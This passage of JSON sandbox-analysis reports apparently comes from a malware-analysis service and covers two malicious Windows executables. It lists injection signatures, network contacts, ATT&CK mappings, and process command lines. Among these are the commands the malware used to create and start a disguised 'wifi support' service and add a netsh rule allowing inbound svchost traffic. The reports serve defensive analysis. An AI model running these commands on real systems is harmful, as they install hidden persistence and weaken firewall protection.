\"C:\\Windows\\System32\\sc.exe\" (Handle: 552)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 552)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 256)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 256)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 256)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 516)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 516)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 516)\n \"clfkcbws.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"clfkcbws.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"clfkcbws.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"clfkcbws.exe\" wrote 86016 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" allocated memory in \"C:\\308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-129", "type": 6, "relevance": 10, "name": "Creates a process in suspended mode (likely for process injection)", "description": "\"clfkcbws.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00005112)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-83", "type": 6, "relevance": 7, "name": "Writes PE header to memory", "description": "\"clfkcbws.exe wrote PE header bytes (\"4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000d80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000fdb74393b9d62dc0b9d62dc0b9d62dc0b9d62cc028d62dc0b0aebec0b6d62dc0d6a083c0b8d62dc0d6a0b3c0b8d62dc0d6a086c0a2d62dc0d6a0b0c0b8d62dc052696368b9d62dc000000000000000000000000000000000504500004c010400e1db595a0000000000000000e00002010b010a0000e60000004a0000000000006b9a0000001000000000010000000a00001000000002000005000100000000000500010000000000005001000004000000000000020040810000100000100000000010000010000000000000100000000000000000000000b0120100a0000000000000000000000000000000000000000000000000000000004001005c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001005c0200000000000000000000000000000000000000000000000000002e74657874000000b0e400000010000000e6000000040000000000000000000000000000200000602e726461746100009a1e0000000001000020000000ea0000000000000000000000000000400000402e64617461000000581900000020010000020000000a0100000000000000000000000000400000c02e72656c6f630000f20f00000040010000100000000c01000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\") to a remote process \"C:\\Windows\\System32\\svchost.exe\"\n which might be an injection preparation attempt ...", "origin": "API Call", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-269", "type": 9, "relevance": 7, "name": "Windows system process connects to a network", "description": "Process \"svchost.exe\" connects to <IPv4>:443", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-10", "type": 7, "relevance": 6, "name": "Sends network traffic on a typical mail related ports", "description": "Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)", "origin": "Network Traffic", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-88", "type": 7, "relevance": 10, "name": "Application communicates with a malicious domain", "description": "Contacted Domain: \"lazystax.ru\" has been identified as malicious", "origin": "Network Traffic", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-303", "type": 9, "relevance": 10, "name": "Starts service using SC.exe", "description": "Process \"sc.exe\" with commandline \"start njrbicei\" (UID: 00000000-00000176)", "origin": "Monitored Target", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-15", "type": 9, "relevance": 8, "name": "Modifies firewall settings", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00005336)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970
https://hybrid-analysis.com/sample/8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970
Hybrid Analysis - Um_unhooking
{"size": 11259392, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970", "sha256": "8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970", "av_detect": 85, "vx_family": "Trojan.BrsecmonE", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 4, "total_processes": 9, "total_signatures": 242, "extracted_files": [{"name": "mojpivf.exe", "file_path": "%TEMP%\\mojpivf.exe", "file_size": 5242368, "sha256": "c24d5fa696edc7466c8023190688d8a212e1d3b923eb990b0858137fb2dd799d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "cmd.exe (PID: 5856)", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}, {"name": "mojpivf.exe.67EE4A81.bin", "file_size": 12996096, "sha256": "e0923aee27fa829c3ef1026ef5051e4f79403e3ebefc5436006427b64b9ff6fd", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}, {"name": "MOJPIVF.EXE.67EE4A82.bin", "file_size": 12996096, "sha256": "e0923aee27fa829c3ef1026ef5051e4f79403e3ebefc5436006427b64b9ff6fd", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}, {"name": "dism.log", "file_size": 279804, "sha256": "e3865fe9abd91f2e21913ad22ae01016c87a3e3ad5b49ec5ee47fe6b1c102027", "type_tags": ["text"], "description": "Unicode text, UTF-8 (with BOM) text, with very long lines (312), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "DISMHOST.EXE.67EE4FF1.bin", "file_size": 82944, "sha256": "ecb636b278261eade712e68ec7d805d20e802628248da872d3d0ada1432ffc11", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24215)", "1 Unknown Objects (build: 24215)", "1 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24215)"], "imported_objects": ["5 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "17 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "30 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "18 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24123)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a small codebase (1 files)"], "total_file_compositions_imports": 91}, "processes": [{"uid": "00000000-00005796", "name": "8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe", "normalized_path": "C:\\8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe", "sha256": "8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970"}, {"uid": "00000000-00005924", "parentuid": "00000000-00005796", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C mkdir %WINDIR%\\system32\\tpxhoiko\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00005856", "parentuid": "00000000-00005796", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C move /Y \"%TEMP%\\mojpivf.exe\" %WINDIR%\\system32\\tpxhoiko\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00006140", "parentuid": "00000000-00005796", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "create tpxhoiko binPath= \"%WINDIR%\\system32\\tpxhoiko\\mojpivf.exe /d\\\"C:\\8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\\\"\" type= own start= auto DisplayName= \"wifi support\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00006016", "parentuid": "00000000-00005796", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "description tpxhoiko \"wifi internet conection\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00004364", "parentuid": "00000000-00005796", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "start tpxhoiko", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00003048", "parentuid": "00000000-00005796", "name": "netsh.exe", "normalized_path": "%WINDIR%\\System32\\netsh.exe", "command_line": "advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\system32\\svchost.exe\" enable=yes>nul", "sha256": "661f5d4ce4f0a6cb32669a43ce5deec6d5a9e19b2387f22c5012405e92169943"}, {"uid": "00000000-00002772", "name": "mojpivf.exe", "normalized_path": "%WINDIR%\\system32\\tpxhoiko\\mojpivf.exe", "command_line": "/d\"C:\\8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\"", "sha256": "e0923aee27fa829c3ef1026ef5051e4f79403e3ebefc5436006427b64b9ff6fd"}, {"uid": "00000000-00005992", "parentuid": "00000000-00002772", "name": "svchost.exe", "normalized_path": "%WINDIR%\\system32\\svchost.exe", "sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Phishing", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566", "malicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 6, "informative_identifiers_count": 14}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 3}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 5, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Exploitation for Privilege Escalation", "attck_id": "T1068", "attck_id_wiki": "https://attack.mitre.org/techniques/T1068", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 5, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Disable or Modify System Firewall", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "NTFS File Attributes", "attck_id": "T1564.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "System Binary Proxy Execution", "attck_id": "T1218", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", 